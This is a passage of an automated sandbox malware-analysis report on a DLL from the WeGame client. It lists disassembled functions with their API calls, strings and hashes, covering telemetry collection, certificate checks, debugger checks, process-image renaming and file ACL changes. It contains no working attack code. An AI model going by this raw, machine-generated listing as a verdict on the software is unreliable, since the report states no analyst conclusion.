6c0a9b40 call 6c0a9420 call 6c0a9360 call 6c0a9e40 call 6c0a9360 471->494 495 6c10b62f-6c10b663 call 6c107750 call 6c0bb933 call 6c0bd278 471->495 472->448 483 6c10b823-6c10b838 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z ?get_log_instance@base@@YAPAVILogger@1@XZ 478->483 484 6c10b89f-6c10b8a7 fclose 478->484 481 6c10b8c0-6c10b8cd 479->481 482 6c10b925-6c10ba25 call 6c0aa3a0 call 6c0a8c40 call 6c0bd278 call 6c0aa3a0 call 6c0bd278 call 6c0aa3a0 * 2 call 6c0bd278 * 2 call 6c1095db call 6c0a9360 call 6c0aed70 call 6c0a9360 * 6 479->482 481->482 492 6c10b8cf-6c10b920 call 6c0ba5ef _errno call 6c0be945 call 6c0bb6ea 481->492 482->188 483->484 486 6c10b83a-6c10b847 483->486 484->482 486->484 499 6c10b849-6c10b89a call 6c0ba5ef _errno call 6c0be945 call 6c0bb6ea 486->499 492->482 494->466 495->494 499->484
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10AC45
                                          • Part of subcall function 6C0FFD6C: __EH_prolog3.LIBCMT ref: 6C0FFD73
                                          • Part of subcall function 6C0FFA18: __EH_prolog3.LIBCMT ref: 6C0FFA1F
                                          • Part of subcall function 6C0AA3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C0B62D8,00000000,6C0B6649,00000003,B33B76E5,?,?,00000000,6C316604,000000FF,?,6C0B5B05,00000000), ref: 6C0AA3E5
                                        • _time32.API-MS-WIN-CRT-TIME-L1-1-0(00000000,game_id,?,?,?,uin,?,00000000,session_id,?,?,user_id,?,00000000,error_code,?), ref: 6C10AE76
                                        • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(00000000,version,?,00000002,dump_time,?,00000000), ref: 6C10AF09
                                        • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(ver1,?,?), ref: 6C10AF5E
                                        • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(ver2,?,?), ref: 6C10AFB4
                                        • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(ver3,?,?), ref: 6C10B00A
                                        • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(ver4,?,?), ref: 6C10B060
                                        • ?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,ver4,?,?), ref: 6C10B069
                                          • Part of subcall function 6C0C737D: __EH_prolog3.LIBCMT ref: 6C0C7384
                                          • Part of subcall function 6C0C737D: ?get_first_mac@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,00000004), ref: 6C0C7390
                                        • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(machine_id,?,00000000,ver4,?,?), ref: 6C10B0BC
                                        • ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,machine_id,?,00000000,ver4,?,?), ref: 6C10B0C7
                                          • Part of subcall function 6C0C741C: __EH_prolog3.LIBCMT ref: 6C0C7423
                                        • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(session_id,?,00000000,machine_id,?,00000000,ver4,?,?), ref: 6C10B115
                                        • ?get_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBEHXZ.COMMON(session_id,?,00000000,machine_id,?,00000000,ver4,?,?), ref: 6C10B11C
                                        • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(channel_id,?,00000000,session_id,?,00000000,machine_id,?,00000000,ver4,?,?), ref: 6C10B15E
                                        • ?get_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBE_KXZ.COMMON(channel_id,?,00000000,session_id,?,00000000,machine_id,?,00000000,ver4,?,?), ref: 6C10B165
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000000), ref: 6C10B673
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,00000000), ref: 6C10B680
                                        • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,6C3469C0), ref: 6C10B7E5
                                          • Part of subcall function 6C107750: __EH_prolog3.LIBCMT ref: 6C107757
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 6C10B816
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000000,machine_id,?,00000000,ver4,?,?), ref: 6C10B82F
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp,000001A2,6C3CE62F,?,?,?,?,00000000,machine_id,?,00000000,ver4,?,?), ref: 6C10B86C
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,00000000,machine_id,?,00000000,ver4,?,?), ref: 6C10B828
                                          • Part of subcall function 6C14B57E: __EH_prolog3_GS.LIBCMT ref: 6C14B585
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000,machine_id,?,00000000,ver4,?,?), ref: 6C10B8A0
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 6C10B8AE
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C10B8B5
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp,000001AA,6C3CE62F), ref: 6C10B8F2
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Application@common@ierd_tgp@@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?instance@H_prolog3V123@$?u16to8@common@ierd_tgp@@D@2@@4@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$D@2@@std@@$?get_log_instance@base@@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@H_prolog3_Logger@1@Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@_errno$?get_bind_game_id@?get_channel_id@?get_first_mac@common@ierd_tgp@@?get_machine_id@?get_session_id@H_prolog3_catch__invalid_parameter_noinfo_noreturn_time32_wfopenfclosefwrite
                                        • String ID: !$[ExptFileProcesser] Dump_meta fopen path = %s, failed(%d)$[ExptFileProcesser] Dump_meta fwrite path = %s, failed(%d)$\meta.json$app_id$bind_game_id$channel_id$cur_name$d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp$data$data_files$desc$dump_time$error_code$expts$feedback_id$game_id$machine_id$orig_path$qos_common$self_int$self_str$session_id$sub_type$time_stamp$trace_id$type$uin$user_id$ver1$ver2$ver3$ver4$version
                                        • API String ID: 3408469005-634620883
                                        • Opcode ID: 94d837a983472f3500a6e9e539363009ce0b0a90e6aeb8b0efd2a0ea365e981f
                                        • Instruction ID: 83101977cb37af85525a77c51b5e6b512dec1d98f1db3cc540574f93cdd3abf1
                                        • Opcode Fuzzy Hash: 94d837a983472f3500a6e9e539363009ce0b0a90e6aeb8b0efd2a0ea365e981f
                                        • Instruction Fuzzy Hash: 26825E31A14258EADB14DBE4CD98BEDB7F8AF10308F5440D8D009A7692EB756F49CF61
                                        Function 6C157C31 Relevance: 72.1, APIs: 32, Strings: 9, Instructions: 386encryptionmemorystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C157C3B
                                        • memset.VCRUNTIME140 ref: 6C157C58
                                        • memset.VCRUNTIME140(?,00000000,00000070), ref: 6C157C8F
                                        • lstrcpyW.KERNEL32(?,?), ref: 6C157C9F
                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C157CDA
                                        • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6C157CFF
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 6C157D11
                                        • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6C157D38
                                        • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 6C157D7F
                                        • CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C157D98
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 6C157DAE
                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C157DC7
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C157DD1
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C157E38
                                        • GetLastError.KERNEL32(00000000,00000001,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000B95,6C3CE62F), ref: 6C157E78
                                        • LocalFree.KERNEL32(00000000), ref: 6C157E9F
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C157EAA
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C157F05
                                        • GetLastError.KERNEL32(00000000,00000001,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000B82,6C3CE62F), ref: 6C157F4D
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C157F5E
                                        • GetLastError.KERNEL32(00000000,00000001,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000B75,6C3CE62F), ref: 6C157FA6
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C157FB4
                                        • GetLastError.KERNEL32(00000000,00000001,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000B64,6C3CE62F), ref: 6C157FF4
                                        • LocalFree.KERNEL32(?), ref: 6C158020
                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C15802F
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C15803A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C158095
                                        • GetLastError.KERNEL32(00000000,00000001,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000B50,6C3CE62F), ref: 6C1580DA
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C1580E8
                                        • GetLastError.KERNEL32(00000000,00000001,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000B42,6C3CE62F), ref: 6C158125
                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C15815C
                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C158171
                                        Strings
                                        • [Sys_wrapper::VerifyCertInfo] LocalAlloc pSignerInfo failed!, xrefs: 6C158080
                                        • [Sys_wrapper::VerifyCertInfo] Get Signer Information failed: %d!, xrefs: 6C157FFB
                                        • [Sys_wrapper::VerifyCertInfo]Subject Name: %s;, xrefs: 6C157E10
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C157DF5, 6C157E5C, 6C157ED6, 6C157F31, 6C157F8A, 6C157FD8, 6C158066, 6C1580C3, 6C15810C
                                        • [Sys_wrapper::VerifyCertInfo] CertFindCertificateInStore failed: %d!, xrefs: 6C157FAD
                                        • [Sys_wrapper::VerifyCertInfo]LocalAlloc szName is null, xrefs: 6C157EF0
                                        • [Sys_wrapper::VerifyCertInfo] CryptQueryObject failed: %u!, xrefs: 6C15812C
                                        • [Sys_wrapper::VerifyCertInfo] Get signer information size failed: %d!, xrefs: 6C1580E1
                                        • [Sys_wrapper::VerifyCertInfo] CertGetNameString failed: %d!, xrefs: 6C157E7F, 6C157F54
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$ErrorLast$Cert$CryptLocal$Free$AllocCertificateCloseNameParamStoreStringmemset$ContextFindH_prolog3H_prolog3_H_prolog3_catch_ObjectQuerylstrcpy
                                        • String ID: [Sys_wrapper::VerifyCertInfo] Get Signer Information failed: %d!$[Sys_wrapper::VerifyCertInfo] Get signer information size failed: %d!$[Sys_wrapper::VerifyCertInfo] CertFindCertificateInStore failed: %d!$[Sys_wrapper::VerifyCertInfo] CertGetNameString failed: %d!$[Sys_wrapper::VerifyCertInfo] CryptQueryObject failed: %u!$[Sys_wrapper::VerifyCertInfo] LocalAlloc pSignerInfo failed!$[Sys_wrapper::VerifyCertInfo]LocalAlloc szName is null$[Sys_wrapper::VerifyCertInfo]Subject Name: %s;$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 2020732910-2120264105
                                        • Opcode ID: fde3db5e11de129f18b6d62b144dd9623ba1759245ad99567185de76f087513a
                                        • Instruction ID: 8d05dd5907b2306098bff4b841a3bbb9f7bdc5cd0b42a016a5399d2699b8c360
                                        • Opcode Fuzzy Hash: fde3db5e11de129f18b6d62b144dd9623ba1759245ad99567185de76f087513a
                                        • Instruction Fuzzy Hash: 4CD1E2B1A51225AFEB20EB64CC49FD977B8AB15708F100095B519FB6C0DB76EE48CF90
                                        Function 6C16677A Relevance: 51.2, APIs: 19, Strings: 10, Instructions: 445timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C166784
                                        • IsDebuggerPresent.KERNEL32(000001A8,6C166F5C,?,?,?,?,00000000,0000005C,6C166E10,?,?,?,?,?), ref: 6C16678B
                                        • ?GetInstance@InfoTraceSystem@trace_system@ierd_tgp@@SAAAV123@XZ.COMMON(?,?,?,?,?,?,?,?,?,6C16661D,B33B76E5,?,?,?,6C316604,000000FF), ref: 6C166799
                                        • ?GetUIN@InfoTraceSystem@trace_system@ierd_tgp@@QAEIXZ.COMMON(?,?,?,?,?,?,?,?,?,6C16661D,B33B76E5,?,?,?,6C316604,000000FF), ref: 6C1667A6
                                        • GetTickCount.KERNEL32 ref: 6C1667BD
                                        • _time32.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,6C16661D,B33B76E5,?,?,?,6C316604), ref: 6C166812
                                        • ?GetTgpWorkState@common@ierd_tgp@@YA?AW4EnumTgpTaskState@12@XZ.COMMON ref: 6C166868
                                        • ?GetAfterTimePairSecond@InfoTraceSystem@trace_system@ierd_tgp@@QAE?AU?$pair@II@std@@I@Z.COMMON(?,?,system_event,main_thread_tick), ref: 6C1668B2
                                        • ?GetUIN@InfoTraceSystem@trace_system@ierd_tgp@@QAEIXZ.COMMON(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C166979
                                        • ?GetTraceInstanceID@InfoTraceSystem@trace_system@ierd_tgp@@QAE_K_KII@Z.COMMON(000186A1,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C166988
                                        • GetTickCount.KERNEL32 ref: 6C166DA4
                                          • Part of subcall function 6C1663C1: __EH_prolog3.LIBCMT ref: 6C1663C8
                                        • ?GetUIN@InfoTraceSystem@trace_system@ierd_tgp@@QAEIXZ.COMMON ref: 6C1669E0
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                        • ?GenerateUniqueMemLog@common@ierd_tgp@@YA_NPAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,?,?,?,?,?,?,00000000,?,perf_type,?,00000000,after_login), ref: 6C166BC8
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,00000000,?,perf_type,?,00000000,after_login,?,?), ref: 6C166BF1
                                        • ?Instance@DumpManager@common@ierd_tgp@@SAAAV123@XZ.COMMON(?,?,?,?,?,?,?,?,00000000,?,perf_type,?,00000000,after_login,?,?), ref: 6C166C69
                                          • Part of subcall function 6C0B4080: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C0B4167
                                        • ?DumpNow@DumpManager@common@ierd_tgp@@QAE_NW4EnumInfoLevel@123@_NPAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@6@K@Z.COMMON(00000000,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?,perf_type), ref: 6C166C7D
                                          • Part of subcall function 6C163F24: __EH_prolog3_GS.LIBCMT ref: 6C163F43
                                          • Part of subcall function 6C163F24: GetTickCount.KERNEL32 ref: 6C163FA0
                                          • Part of subcall function 6C163F24: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,?,?,DumpNow,00000007), ref: 6C164010
                                          • Part of subcall function 6C163F24: _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,?,?,DumpNow,00000007), ref: 6C164071
                                          • Part of subcall function 6C163F24: memset.VCRUNTIME140(?,00000000,?,?,DumpNow,00000007), ref: 6C164093
                                          • Part of subcall function 6C163F24: _localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,00000000,?,?,DumpNow,00000007), ref: 6C1640A6
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,6C3411A4,?,?,?,?,?,?,?,?,00000000,?,perf_type,?,00000000,after_login), ref: 6C166C97
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,00000000,?,perf_type,?,00000000,after_login,?,?), ref: 6C166CE5
                                        • ?TraceInfo@InfoTraceSystem@trace_system@ierd_tgp@@QAE_N_KABUTraceInformation@23@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,00000000,?,perf_type,?,00000000), ref: 6C166D64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Trace$Info$System@trace_system@ierd_tgp@@$?get_log_instance@base@@Logger@1@$CountDumpTick$D@std@@EnumH_prolog3H_prolog3_Instance@Manager@common@ierd_tgp@@U?$char_traits@U?$char_traits@_V123@V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@$AfterD@2@@4@@D@2@@6@DebuggerGenerateI@std@@Info@Information@23@@InstanceLevel@123@_Log@common@ierd_tgp@@Now@PairPresentSecond@State@12@State@common@ierd_tgp@@TaskTimeU?$pair@UniqueWork_invalid_parameter_noinfo_noreturn_localtime64_s_time32_time64memmovememset
                                        • String ID: [TraceEvent] Main thread trace dump generated$[TraceEvent] Main thread trace dump got failed$[TraceEvent] Main thread trace will generate dump$after_login$after_start$d:\ci_dev\wegame_client\codes\common\src\trace_event.cpp$main_thread_tick$perf_type$system_event$tgp_tick_warning
                                        • API String ID: 2131266272-450692783
                                        • Opcode ID: 07d758ac04fec972c8da687edf63b23b1f0dc35fcbc4c82632bde93f4502a506
                                        • Instruction ID: bd9f3e071d907bea1840b8ac74d2eeca5ce8c46b59c12bab595a930c1af228dd
                                        • Opcode Fuzzy Hash: 07d758ac04fec972c8da687edf63b23b1f0dc35fcbc4c82632bde93f4502a506
                                        • Instruction Fuzzy Hash: D802A171910608DFDB15DBB4C860BEEB7B8AF55308F10859DE04AB7A41EF31AA49CF61
                                        Function 6C156FE1 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 334comlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C156FEB
                                        • ?IsWin10_OS@Sys_wrapper@common@ierd_tgp@@SA_NXZ.COMMON(0000046C), ref: 6C157002
                                          • Part of subcall function 6C153669: memset.VCRUNTIME140(?,00000000,00000118), ref: 6C15368A
                                          • Part of subcall function 6C153669: GetVersionExW.KERNEL32(0000011C), ref: 6C1536A3
                                        • ShellExecuteW.SHELL32(00000000,?,?,00000000,00000000,00000000), ref: 6C15705C
                                        • GetCurrentProcess.KERNEL32(?), ref: 6C1570D1
                                        • ?ChangeProcessImageName@Sys_wrapper@common@ierd_tgp@@SA_NPAXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000), ref: 6C1570D8
                                        • CoInitialize.OLE32(00000000), ref: 6C157107
                                        • memset.VCRUNTIME140(?,00000000,00000208), ref: 6C15711A
                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 6C157127
                                        • LoadStringW.USER32(00000000,?,?,00000104), ref: 6C157154
                                        • CoCreateInstance.OLE32(6C35C5E0,00000000,00000015,6C35C5D0,?), ref: 6C15717C
                                        • memset.VCRUNTIME140(?,00000000,00000208), ref: 6C1571AD
                                        • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 6C1571C8
                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 6C1571D8
                                        • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 6C157242
                                        • PathStripPathW.SHLWAPI(?), ref: 6C157252
                                        • SysFreeString.OLEAUT32(?), ref: 6C157291
                                        • VariantClear.OLEAUT32(?), ref: 6C157355
                                        • VarBstrCmp.OLEAUT32(?,?,00000400,00000000), ref: 6C157399
                                        • SysFreeString.OLEAUT32(?), ref: 6C1573AD
                                        • SysFreeString.OLEAUT32(?), ref: 6C1573FF
                                        • SysFreeString.OLEAUT32(?), ref: 6C157423
                                        • VariantClear.OLEAUT32(?), ref: 6C157448
                                        • CoUninitialize.OLE32 ref: 6C157478
                                        • FreeLibrary.KERNEL32(?), ref: 6C157489
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: FreeString$Pathmemset$ClearLibraryLoadProcessSys_wrapper@common@ierd_tgp@@Variantwcscpy_s$BstrChangeCreateCurrentExecuteFileH_prolog3_ImageInitializeInstanceName@RemoveShellSpecStripU?$char_traits@_UninitializeV?$allocator@_V?$basic_string@_VersionW@2@@std@@@W@std@@Win10_
                                        • String ID: Shell32.dll$explorer.exe$taskbarpin$taskbarunpin
                                        • API String ID: 2794181495-2015950778
                                        • Opcode ID: 6aabe355afbf63a1285b2c63254f173e10362d3194e7474b929a359448aa8d39
                                        • Instruction ID: 252d99d7cd9c589053d81fc3fba03ebd389b67de522010aaeb41672010a299a8
                                        • Opcode Fuzzy Hash: 6aabe355afbf63a1285b2c63254f173e10362d3194e7474b929a359448aa8d39
                                        • Instruction Fuzzy Hash: 2BE16BB0A10258DFDB20DB64CC48BDDBBB8AF49308F5081D9E619A7241DB749F85CFA5
                                        Function 6C15687C Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 303COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C156886
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 6C1568BF
                                          • Part of subcall function 6C14B57E: __EH_prolog3_GS.LIBCMT ref: 6C14B585
                                        • ?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z.COMMON(?,?,?,Administrators), ref: 6C156926
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,Administrators), ref: 6C156953
                                        • ?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z.COMMON(?,?,?,Users,?,Administrators), ref: 6C156A24
                                        • GetUserNameW.ADVAPI32(?,?), ref: 6C156AD9
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?), ref: 6C156B4E
                                        • ?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z.COMMON(?,?,?,?,?), ref: 6C156BC5
